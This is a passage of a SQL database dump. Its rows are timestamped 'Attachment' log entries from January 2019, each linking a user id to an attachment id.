22:15:44',NULL),(16126,2,'Attachment',365,'2019-01-07 22:15:46','2019-01-07 22:15:46',NULL),(16127,2,'Attachment',385,'2019-01-07 22:43:51','2019-01-07 22:43:51',NULL),(16128,2,'Attachment',419,'2019-01-07 22:43:52','2019-01-07 22:43:52',NULL),(16129,2,'Attachment',416,'2019-01-07 22:43:52','2019-01-07 22:43:52',NULL),(16130,2,'Attachment',403,'2019-01-07 22:43:52','2019-01-07 22:43:52',NULL),(16131,2,'Attachment',397,'2019-01-07 22:43:52','2019-01-07 22:43:52',NULL),(16132,2,'Attachment',382,'2019-01-07 22:43:52','2019-01-07 22:43:52',NULL),(16133,2,'Attachment',421,'2019-01-07 22:43:52','2019-01-07 22:43:52',NULL),(16134,2,'Attachment',397,'2019-01-08 01:37:23','2019-01-08 01:37:23',NULL),(16135,2,'Attachment',416,'2019-01-08 01:37:23','2019-01-08 01:37:23',NULL),(16136,2,'Attachment',419,'2019-01-08 01:37:23','2019-01-08 01:37:23',NULL),(16137,2,'Attachment',403,'2019-01-08 01:37:23','2019-01-08 01:37:23',NULL),(16138,2,'Attachment',382,'2019-01-08 01:37:23','2019-01-08 01:37:23',NULL),(16139,2,'Attachment',385,'2019-01-08 01:37:23','2019-01-08 01:37:23',NULL),(16140,2,'Attachment',421,'2019-01-08 01:37:24','2019-01-08 01:37:24',NULL),(16141,2,'Attachment',397,'2019-01-08 05:02:02','2019-01-08 05:02:02',NULL),(16142,2,'Attachment',419,'2019-01-08 05:10:13','2019-01-08 05:10:13',NULL),(16143,2,'Attachment',385,'2019-01-08 05:10:13','2019-01-08 05:10:13',NULL),(16144,2,'Attachment',397,'2019-01-08 05:10:13','2019-01-08 05:10:13',NULL),(16145,2,'Attachment',416,'2019-01-08 05:10:13','2019-01-08 05:10:13',NULL),(16146,2,'Attachment',403,'2019-01-08 05:10:13','2019-01-08 05:10:13',NULL),(16147,2,'Attachment',382,'2019-01-08 05:10:14','2019-01-08 05:10:14',NULL),(16148,2,'Attachment',421,'2019-01-08 05:10:14','2019-01-08 05:10:14',NULL),(16149,2,'Attachment',403,'2019-01-08 08:36:02','2019-01-08 08:36:02',NULL),(16150,2,'Attachment',419,'2019-01-08 08:36:02','2019-01-08 08:36:02',NULL),(16151,2,'Attachment',416,'2019-01-08 08:36:02','2019-01-08 08:36:02',NULL),(16152,2,'Attachment',385,'2019-01-08 08:36:02','2019-01-08 08:36:02',NULL),(16153,2,'Attachment',382,'2019-01-08 08:36:02','2019-01-08 08:36:02',NULL),(16154,2,'Attachment',397,'2019-01-08 08:36:02','2019-01-08 08:36:02',NULL),(16155,2,'Attachment',421,'2019-01-08 08:36:03','2019-01-08 08:36:03',NULL),(16156,2,'Attachment',416,'2019-01-08 08:37:02','2019-01-08 08:37:02',NULL),(16157,2,'Attachment',397,'2019-01-08 08:37:02','2019-01-08 08:37:02',NULL),(16158,2,'Attachment',403,'2019-01-08 08:37:02','2019-01-08 08:37:02',NULL),(16159,2,'Attachment',385,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16160,2,'Attachment',416,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16161,2,'Attachment',382,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16162,2,'Attachment',397,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16163,2,'Attachment',403,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16164,2,'Attachment',419,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16165,2,'Attachment',421,'2019-01-08 08:47:08','2019-01-08 08:47:08',NULL),(16166,2,'Attachment',385,'2019-01-08 08:48:08','2019-01-08 08:48:08',NULL),(16167,2,'Attachment',416,'2019-01-08 08:48:08','2019-01-08 08:48:08',NULL),(16168,2,'Attachment',403,'2019-01-08 08:48:08','2019-01-08 08:48:08',NULL),(16169,2,'Attachment',419,'2019-01-08 08:48:08','2019-01-08 08:48:08',NULL),(16170,2,'Attachment',397,'2019-01-08 08:48:08','2019-01-08 08:48:08',NULL),(16171,2,'Attachment',421,'2019-01-08 08:48:09','2019-01-08 08:48:09',NULL),(16172,2,'Attachment',382,'2019-01-08 08:48:09','2019-01-08 08:48:09',NULL),(16173,2,'Attachment',385,'2019-01-08 08:48:58','2019-01-08 08:48:58',NULL),(16174,2,'Attachment',416,'2019-01-08 08:48:58','2019-01-08 08:48:58',NULL),(16175,2,'Attachment',419,'2019-01-08 08:48:59','2019-01-08 08:48:59',NULL),(16176,2,'Attachment',403,'2019-01-08 08:48:59','2019-01-08 08:48:59',NULL),(16177,2,'Attachment',397,'2019-01-08 08:48:59','2019-01-08 08:48:59',NULL),(16178,2,'Attachment',382,'2019-01-08 08:49:01','2019-01-08 08:49:01',NULL),(16179,2,'Attachment',421,'2019-01-08 08:49:01','2019-01-08 08:49:01',NULL),(16180,2,'Attachment',416,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16181,2,'Attachment',403,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16182,2,'Attachment',419,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16183,2,'Attachment',382,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16184,2,'Attachment',397,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16185,2,'Attachment',385,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16186,2,'Attachment',421,'2019-01-08 10:35:59','2019-01-08 10:35:59',NULL),(16187,2,'Attachment',341,'2019-01-08 10:52:03','2019-01-08 10:52:03',NULL),(16188,2,'Attachment',344,'2019-01-08 10:52:03','2019-01-08 10:52:03',NULL),(16189,2,'Attachment',354,'2019-01-08 10:52:03','2019-01-08 10:52:03',NULL),(16190,2,'Attachment',365,'2019-01-08 10:52:03','2019-01-08 10:52:03',NULL),(16191,2,'Attachment',363,'2019-01-08 10:52:03','2019-01-08 10:52:03',NULL),(16192,2,'Attachment',335,'2019-01-08 10:52:03','2019-01-08 10:52:03',NULL),(16193,2,'Attachment',397,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16194,2,'Attachment',421,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16195,2,'Attachment',416,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16196,2,'Attachment',403,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16197,2,'Attachment',385,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16198,2,'Attachment',419,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16199,2,'Attachment',382,'2019-01-08 10:53:46','2019-01-08 10:53:46',NULL),(16200,2,'Attachment',385,'2019-01-08 11:05:13','2019-01-08 11:05:13',NULL),(16201,2,'Attachment',416,'2019-01-08 11:05:13','2019-01-08 11:05:13',NULL),(16202,2,'Attachment',419,'2019-01-08 11:05:13','2019-01-08 11:05:13',NULL),(16203,2,'Attachment',403,'2019-01-08 11:05:13','2019-01-08 11:05:13',NULL),(16204,2,'Attachment',397,'2019-01-08 11:05:13','2019-01-08 11:05:13',NULL),(16205,2,'Attachment',382,'2019-01-08 11:05:13','2019-01-08 11:05:13',NULL),(16206,2,'Attachment',421,'2019-01-08 11:05:14','2019-01-08 11:05:14',NULL),(16207,2,'Attachment',385,'2019-01-08 11:31:16','2019-01-08 11:31:16',NULL),(16208,2,'Attachment',419,'2019-01-08 11:31:16','2019-01-08 11:31:16',NULL),(16209,2,'Attachment',403,'2019-01-08 11:31:16','2019-01-08 11:31:16',NULL),(16210,2,'Attachment',416,'2019-01-08 11:31:16','2019-01-08 11:31:16',NULL),(16211,2,'Attachment',397,'2019-01-08 11:31:16','2019-01-08 11:31:16',NULL),(16212,2,'Attachment',421,'2019-01-08 11:31:16','2019-01-08 11:31:16',NULL),(16213,2,'Attachment',382,'2019-01-08 11:31:17','2019-01-08 11:31:17',NULL),(16214,2,'Attachment',363,'2019-01-08 11:31:21','2019-01-08 11:31:21',NULL),(16215,2,'Attachment',365,'2019-01-08 11:31:21','2019-01-08 11:31:21',NULL),(16216,2,'Attachment',354,'2019-01-08 11:31:21','2019-01-08 11:31:21',NULL),(16217,2,'Attachment',341,'2019-01-08 11:31:21','2019-01-08 11:31:21',NULL),(16218,2,'Attachment',344,'2019-01-08 11:31:21','2019-01-08 11:31:21',NULL),(16219,2,'Attachment',335,'2019-01-08 11:31:22','2019-01-08 11:31:22',NULL),(16220,2,'Attachment',180,'2019-01-08 11:31:27','2019-01-08 11:31:27',NULL),(16221,2,'Attachment',371,'2019-01-08 11:31:27','2019-01-08 11:31:27',NULL),(16222,2,'Attachment',288,'2019-01-08 11:31:27','2019-01-08 11:31:27',NULL),(16223,2,'Attachment',29,'2019-01-08 11:31:31','2019-01-08 11:31:31',NULL),(16224,2,'Attachment',36,'2019-01-08 11:31:31','2019-01-08 11:31:31',NULL),(16225,2,'Attachment',14,'2019-01-08 11:31:31','2019-01-08 11:31:31',NULL),(16226,2,'Attachment',24,'2019-01-08 11:31:31','2019-01-08 11:31:31',NULL),(16227,2,'Attachment',28,'2019-01-08 11:31:37','2019-01-08 11:31:37',NULL),(16228,2,'Attachment',181,'2019-01-08 11:31:37','2019-01-08 11:31:37',NULL),(16229,2,'Attachment',57,'2019-01-08 11:31:38','2019-01-08 11:31:38',NULL),(16230,2,'Attachment',290,'2019-01-08 11:31:39','2019-01-08 11:31:39',NULL),(16231,2,'Attachment',294,'2019-01-08 11:31:39','2019-01-08 11:31:39',NULL),(16232,2,'Attachment',49,'2019-01-08 11:31:39','2019-01-08 11:31:39',NULL),(16233,2,'Attachment',50,'2019-01-08 11:31:39','2019-01-08 11:31:39',NULL),(16234,2,'Attachment',280,'2019-01-08 11:31:39','2019-01-08 11:31:39',NULL),(16235,2,'Attachment',274,'2019-01-08 11:31:40','2019-01-08 11:31:40',NULL),(16236,2,'Attachment',41,'2019-01-08 11:31:40','2019-01-08 11:31:40',NULL),(16237,2,'Attachment',42,'2019-01-08 11:31:41','2019-01-08 11:31:41',NULL),(16238,2,'Attachment',47,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16239,2,'Attachment',44,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16240,2,'Attachment',45,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16241,2,'Attachment',46,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16242,2,'Attachment',48,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16243,2,'Attachment',40,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16244,2,'Attachment',9,'2019-01-08 11:31:44','2019-01-08 11:31:44',NULL),(16245,2,'Attachment',420,'2019-01-08 11:31:45','2019-01-08 11:31:45',NULL),(16246,2,'Attachment',419,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16247,2,'Attachment',416,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16248,2,'Attachment',403,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16249,2,'Attachment',397,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16250,2,'Attachment',382,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16251,2,'Attachment',385,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16252,2,'Attachment',421,'2019-01-08 12:39:23','2019-01-08 12:39:23',NULL),(16253,2,'Attachment',421,'2019-01-08 12:39:44','2019-01-08 12:39:44',NULL),(16254,2,'Attachment',382,'2019-01-08 12:39:44','2019-01-08 12:39:44',NULL),(16255,2,'Attachment',419,'2019-01-08 12:39:45','2019-01-08 12:39:45',NULL),(16256,2,'Attachment',416,'2019-01-08 12:39:45','2019-01-08 12:39:45',NULL),(16257,2,'Attachment',385,'2019-01-08 12:39:45','2019-01-08 12:39:45',NULL),(16258,2,'Attachment',403,'2019-01-08 12:39:52','2019-01-08 12:39:52',NULL),(16259,2,'Attachment',397,'2019-01-08 12:39:52','2019-01-08 12:39:52',NULL),(16260,2,'Attachment',385,'2019-01-08 13:09:43','2019-01-08 13:09:43',NULL),(16261,2,'Attachment',419,'2019-01-08 13:09:44','2019-01-08 13:09:44',NULL),(16262,2,'Attachment',403,'2019-01-08 13:09:44','2019-01-08 13:09:44',NULL),(16263,2,'Attachment',416,'2019-01-08 13:09:44','2019-01-08 13:09:44',NULL),(16264,2,'Attachment',397,'2019-01-08 13:09:44','2019-01-08 13:09:44',NULL),(16265,2,'Attachment',382,'2019-01-08 13:09:44','2019-01-08 13:09:44',NULL),(16266,2,'Attachment',421,'2019-01-08 13:09:44','2019-01-08 13:09:44',NULL),(16267,2,'Attachment',416,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16268,2,'Attachment',382,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16269,2,'Attachment',397,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16270,2,'Attachment',403,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16271,2,'Attachment',419,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16272,2,'Attachment',385,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16273,2,'Attachment',421,'2019-01-08 13:21:43','2019-01-08 13:21:43',NULL),(16274,2,'Attachment',419,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16275,2,'Attachment',397,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16276,2,'Attachment',403,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16277,2,'Attachment',382,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16278,2,'Attachment',416,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16279,2,'Attachment',385,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16280,2,'Attachment',421,'2019-01-08 14:07:01','2019-01-08 14:07:01',NULL),(16281,2,'Attachment',382,'2019-01-08 14:57:29','2019-01-08 14:57:29',NULL),(16282,2,'Attachment',419,'2019-01-08 14:57:29','2019-01-08 14:57:29',NULL),(16283,2,'Attachment',416,'2019-01-08 14:57:29','2019-01-08 14:57:29',NULL),(16284,2,'Attachment',397,'2019-01-08 14:57:29','2019-01-08 14:57:29',NULL),(16285,2,'Attachment',403,'2019-01-08 14:57:29','2019-01-08 14:57:29',NULL),(16286,2,'Attachment',385,'2019-01-08 14:57:29','2019-01-08 14:57:29',NULL),(16287,2,'Attachment',421,'2019-01-08 14:57:30','2019-01-08 14:57:30',NULL),(16288,2,'Attachment',334,'2019-01-08 15:35:21','2019-01-08 15:35:21',NULL),(16289,2,'Attachment',385,'2019-01-08 15:46:23','2019-01-08 15:46:23',NULL),(16290,2,'Attachment',419,'2019-01-08 15:46:23','2019-01-08 15:46:23',NULL),(16291,2,'Attachment',416,'2019-01-08 15:46:23','2019-01-08 15:46:23',NULL),(16292,2,'Attachment',397,'2019-01-08 15:46:23','2019-01-08 15:46:23',NULL),(16293,2,'Attachment',403,'2019-01-08 15:46:23','2019-01-08 15:46:23',NULL),(16294,2,'Attachment',382,'2019-01-08 15:46:23','2019-01-08 15:46:23',NULL),(16295,2,'Attachment',421,'2019-01-08 15:46:24','2019-01-08 15:46:24',NULL),(16296,2,'Attachment',341,'2019-01-08 15:46:35','2019-01-08 15:46:35',NULL),(16297,2,'Attachment',363,'2019-01-08 15:46:35','2019-01-08 15:46:35',NULL),(16298,2,'Attachment',335,'2019-01-08 15:46:35','2019-01-08 15:46:35',NULL),(16299,2,'Attachment',365,'2019-01-08 15:46:35','2019-01-08 15:46:35',NULL),(16300,2,'Attachment',354,'2019-01-08 15:46:35','2019-01-08 15:46:35',NULL),(16301,2,'Attachment',344,'2019-01-08 15:46:35','2019-01-08 15:46:35',NULL),(16302,2,'Attachment',385,'2019-01-08 17:02:58','2019-01-08 17:02:58',NULL),(16303,2,'Attachment',419,'2019-01-08 17:02:58','2019-01-08 17:02:58',NULL),(16304,2,'Attachment',416,'2019-01-08 17:02:59','2019-01-08 17:02:59',NULL),(16305,2,'Attachment',403,'2019-01-08 17:02:59','2019-01-08 17:02:59',NULL),(16306,2,'Attachment',397,'2019-01-08 17:02:59','2019-01-08 17:02:59',NULL),(16307,2,'Attachment',421,'2019-01-08 17:02:59','2019-01-08 17:02:59',NULL),(16308,2,'Attachment',382,'2019-01-08 17:02:59','2019-01-08 17:02:59',NULL),(16309,2,'Attachment',418,'2019-01-08 17:03:31','2019-01-08 17:03:31',NULL),(16310,2,'Attachment',417,'2019-01-08 17:03:31','2019-01-08 17:03:31',NULL),(16311,2,'Attachment',401,'2019-01-08 17:03:36','2019-01-08 17:03:36',NULL),(16312,2,'Attachment',399,'2019-01-08 17:03:36','2019-01-08 17:03:36',NULL),(16313,2,'Attachment',400,'2019-01-08 17:03:36','2019-01-08 17:03:36',NULL),(16314,2,'Attachment',402,'2019-01-08 17:03:36','2019-01-08 17:03:36',NULL),(16315,2,'Attachment',398,'2019-01-08 17:03:36','2019-01-08 17:03:36',NULL),(16316,2,'Attachment',46,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16317,2,'Attachment',45,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16318,2,'Attachment',47,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16319,2,'Attachment',40,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16320,2,'Attachment',48,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16321,2,'Attachment',44,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16322,2,'Attachment',9,'2019-01-08 17:03:43','2019-01-08 17:03:43',NULL),(16323,2,'Attachment',334,'2019-01-08 18:18:50','2019-01-08 18:18:50',NULL),(16324,2,'Attachment',334,'2019-01-08 18:21:18','2019-01-08 18:21:18',NULL),(16325,2,'Attachment',419,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16326,2,'Attachment',382,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16327,2,'Attachment',397,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16328,2,'Attachment',416,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16329,2,'Attachment',403,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16330,2,'Attachment',385,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16331,2,'Attachment',421,'2019-01-08 18:57:09','2019-01-08 18:57:09',NULL),(16332,2,'Attachment',385,'2019-01-08 19:27:08','2019-01-08 19:27:08',NULL),(16333,2,'Attachment',419,'2019-01-08 19:27:10','2019-01-08 19:27:10',NULL),(16334,2,'Attachment',416,'2019-01-08 19:27:10','2019-01-08 19:27:10',NULL),(16335,2,'Attachment',397,'2019-01-08 19:27:10','2019-01-08 19:27:10',NULL),(16336,2,'Attachment',382,'2019-01-08 19:27:10','2019-01-08 19:27:10',NULL),(16337,2,'Attachment',421,'2019-01-08 19:27:10','2019-01-08 19:27:10',NULL),(16338,2,'Attachment',403,'2019-01-08 19:27:11','2019-01-08 19:27:11',NULL),(16339,2,'Attachment',398,'2019-01-08 19:28:08','2019-01-08 19:28:08',NULL),(16340,2,'Attachment',399,'2019-01-08 19:28:08','2019-01-08 19:28:08',NULL),(16341,2,'Attachment',400,'2019-01-08 19:28:08','2019-01-08 19:28:08',NULL),(16342,2,'Attachment',383,'2019-01-08 19:28:08','2019-01-08 19:28:08',NULL),(16343,2,'Attachment',401,'2019-01-08 19:28:09','2019-01-08 19:28:09',NULL),(16344,2,'Attachment',402,'2019-01-08 19:28:10','2019-01-08 19:28:10',NULL),(16345,2,'Attachment',334,'2019-01-08 21:46:40','2019-01-08 21:46:40',NULL),(16346,2,'Attachment',382,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16347,2,'Attachment',403,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16348,2,'Attachment',416,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16349,2,'Attachment',419,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16350,2,'Attachment',385,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16351,2,'Attachment',397,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16352,2,'Attachment',421,'2019-01-08 23:50:28','2019-01-08 23:50:28',NULL),(16353,2,'Attachment',397,'2019-01-09 01:05:33','2019-01-09 01:05:33',NULL),(16354,2,'Attachment',382,'2019-01-09 01:05:33','2019-01-09 01:05:33',NULL),(16355,2,'Attachment',403,'2019-01-09 01:05:33','2019-01-09 01:05:33',NULL),(16356,2,'Attachment',419,'2019-01-09 01:05:33','2019-01-09 01:05:33',NULL),(16357,2,'Attachment',416,'2019-01-09 01:05:33','2019-01-09 01:05:33',NULL),(16358,2,'Attachment',385,'2019-01-09 01:05:34','2019-01-09 01:05:34',NULL),(16359,2,'Attachment',421,'2019-01-09 01:05:34','2019-01-09 01:05:34',NULL),(16360,2,'Attachment',419,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16361,2,'Attachment',403,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16362,2,'Attachment',416,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16363,2,'Attachment',382,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16364,2,'Attachment',397,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16365,2,'Attachment',385,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16366,2,'Attachment',421,'2019-01-09 02:14:51','2019-01-09 02:14:51',NULL),(16367,2,'Attachment',416,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16368,2,'Attachment',385,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16369,2,'Attachment',397,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16370,2,'Attachment',403,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16371,2,'Attachment',382,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16372,2,'Attachment',419,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16373,2,'Attachment',421,'2019-01-09 04:02:55','2019-01-09 04:02:55',NULL),(16374,2,'Attachment',385,'2019-01-09 04:59:54','2019-01-09 04:59:54',NULL),(16375,2,'Attachment',419,'2019-01-09 04:59:55','2019-01-09 04:59:55',NULL),(16376,2,'Attachment',416,'2019-01-09 04:59:56','2019-01-09 04:59:56',NULL),(16377,2,'Attachment',403,'2019-01-09 04:59:57','2019-01-09 04:59:57',NULL),(16378,2,'Attachment',397,'2019-01-09 04:59:58','2019-01-09 04:59:58',NULL),(16379,2,'Attachment',382,'2019-01-09 05:00:01','2019-01-09 05:00:01',NULL),(16380,2,'Attachment',421,'2019-01-09 05:00:02','2019-01-09 05:00:02',NULL),(16381,2,'Attachment',416,'2019-01-09 05:11:32','2019-01-09 05:11:32',NULL),(16382,2,'Attachment',397,'2019-01-09 05:11:32','2019-01-09 05:11:32',NULL),(16383,2,'Attachment',419,'2019-01-09 05:11:32','2019-01-09 05:11:32',NULL),(16384,2,'Attachment',403,'2019-01-09 05:11:32','2019-01-09 05:11:32',NULL),(16385,2,'Attachment',382,'2019-01-09 05:11:32','2019-01-09 05:11:32',NULL),(16386,2,'Attachment',385,'2019-01-09 05:11:32','2019-01-09 05:11:32',NULL),(16387,2,'Attachment',421,'2019-01-09 05:11:33','2019-01-09 05:11:33',NULL),(16388,2,'Attachment',385,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16389,2,'Attachment',419,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16390,2,'Attachment',416,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16391,2,'Attachment',403,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16392,2,'Attachment',397,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16393,2,'Attachment',382,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16394,2,'Attachment',421,'2019-01-09 06:46:57','2019-01-09 06:46:57',NULL),(16395,2,'Attachment',420,'2019-01-09 06:47:13','2019-01-09 06:47:13',NULL),(16396,2,'Attachment',366,'2019-01-09 06:50:14','2019-01-09 06:50:14',NULL),(16397,2,'Attachment',416,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16398,2,'Attachment',419,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16399,2,'Attachment',403,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16400,2,'Attachment',397,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16401,2,'Attachment',382,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16402,2,'Attachment',385,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16403,2,'Attachment',421,'2019-01-09 08:43:19','2019-01-09 08:43:19',NULL),(16404,2,'Attachment',419,'2019-01-09 10:25:00','2019-01-09 10:25:00',NULL),(16405,2,'Attachment',397,'2019-01-09 10:25:00','2019-01-09 10:25:00',NULL),(16406,2,'Attachment',416,'2019-01-09 10:25:00','2019-01-09 10:25:00',NULL),(16407,2,'Attachment',403,'2019-01-09 10:25:00','2019-01-09 10:25:00',NULL),(16408,2,'Attachment',382,'2019-01-09 10:25:00','2019-01-09 10:25:00',NULL),(16409,2,'Attachment',385,'2019-01-09 10:25:01','2019-01-09 10:25:01',NULL),(16410,2,'Attachment',421,'2019-01-09 10:25:01','2019-01-09 10:25:01',NULL),(16411,2,'Attachment',419,'2019-01-09 10:33:42','2019-01-09 10:33:42',NULL),(16412,2,'Attachment',385,'2019-01-09 10:33:42','2019-01-09 10:33:42',NULL),(16413,2,'Attachment',421,'2019-01-09 10:33:42','2019-01-09 10:33:42',NULL),(16414,2,'Attachment',416,'2019-01-09 10:33:42','2019-01-09 10:33:42',NULL),(16415,2,'Attachment',403,'2019-01-09 10:33:43','2019-01-09 10:33:43',NULL),(16416,2,'Attachment',397,'2019-01-09 10:33:43','2019-01-09 10:33:43',NULL),(16417,2,'Attachment',382,'2019-01-09 10:33:43','2019-01-09 10:33:43',NULL),(16418,2,'Attachment',419,'2019-01-09 11:06:18','2019-01-09 11:06:18',NULL),(16419,2,'Attachment',385,'2019-01-09 11:06:18','2019-01-09 11:06:18',NULL),(16420,2,'Attachment',416,'2019-01-09 11:06:19','2019-01-09 11:06:19',NULL),(16421,2,'Attachment',403,'2019-01-09 11:06:19','2019-01-09 11:06:19',NULL),(16422,2,'Attachment',397,'2019-01-09 11:06:19','2019-01-09 11:06:19',NULL),(16423,2,'Attachment',382,'2019-01-09 11:06:19','2019-01-09 11:06:19',NULL),(16424,2,'Attachment',421,'2019-01-09 11:06:19','2019-01-09 11:06:19',NULL),(16425,2,'Attachment',363,'2019-01-09 11:13:30','2019-01-09 11:13:30',NULL),(16426,2,'Attachment',365,'2019-01-09 11:13:30','2019-01-09 11:13:30',NULL),(16427,2,'Attachment',354,'2019-01-09 11:13:30','2019-01-09 11:13:30',NULL),(16428,2,'Attachment',335,'2019-01-09 11:13:30','2019-01-09 11:13:30',NULL),(16429,2,'Attachment',341,'2019-01-09 11:13:30','2019-01-09 11:13:30',NULL),(16430,2,'Attachment',344,'2019-01-09 11:13:30','2019-01-09 11:13:30',NULL),(16431,2,'Attachment',41,'2019-01-09 11:13:31','2019-01-09 11:13:31',NULL),(16432,2,'Attachment',42,'2019-01-09 11:13:31','2019-01-09 11:13:31',NULL),(16433,2,'Attachment',50,'2019-01-09 11:13:39','2019-01-09 11:13:39',NULL),(16434,2,'Attachment',290,'2019-01-09 11:13:39','2019-01-09 11:13:39',NULL),(16435,2,'Attachment',49,'2019-01-09 11:13:39','2019-01-09 11:13:39',NULL),(16436,2,'Attachment',294,'2019-01-09 11:13:39','2019-01-09 11:13:39',NULL),(16437,2,'Attachment',280,'2019-01-09 11:13:39','2019-01-09 11:13:39',NULL),(16438,2,'Attachment',274,'2019-01-09 11:13:39','2019-01-09 11:13:39',NULL),(16439,2,'Attachment',28,'2019-01-09 11:13:43','2019-01-09 11:13:43',NULL),(16440,2,'Attachment',288,'2019-01-09 11:13:43','2019-01-09 11:13:43',NULL),(16441,2,'Attachment',181,'2019-01-09 11:13:43','2019-01-09 11:13:43',NULL),(16442,2,'Attachment',57,'2019-01-09 11:13:43','2019-01-09 11:13:43',NULL),(16443,2,'Attachment',371,'2019-01-09 11:13:45','2019-01-09 11:13:45',NULL),(16444,2,'Attachment',180,'2019-01-09 11:13:45','2019-01-09 11:13:45',NULL),(16445,2,'Attachment',419,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16446,2,'Attachment',403,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16447,2,'Attachment',385,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16448,2,'Attachment',416,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16449,2,'Attachment',382,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16450,2,'Attachment',397,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16451,2,'Attachment',421,'2019-01-09 12:07:23','2019-01-09 12:07:23',NULL),(16452,2,'Attachment',365,'2019-01-09 12:07:28','2019-01-09 12:07:28',NULL),(16453,2,'Attachment',363,'2019-01-09 12:07:28','2019-01-09 12:07:28',NULL),(16454,2,'Attachment',354,'2019-01-09 12:07:29','2019-01-09 12:07:29',NULL),(16455,2,'Attachment',344,'2019-01-09 12:07:29','2019-01-09 12:07:29',NULL),(16456,2,'Attachment',341,'2019-01-09 12:07:29','2019-01-09 12:07:29',NULL),(16457,2,'Attachment',335,'2019-01-09 12:07:30','2019-01-09 12:07:30',NULL),(16458,2,'Attachment',419,'2019-01-09 12:13:57','2019-01-09 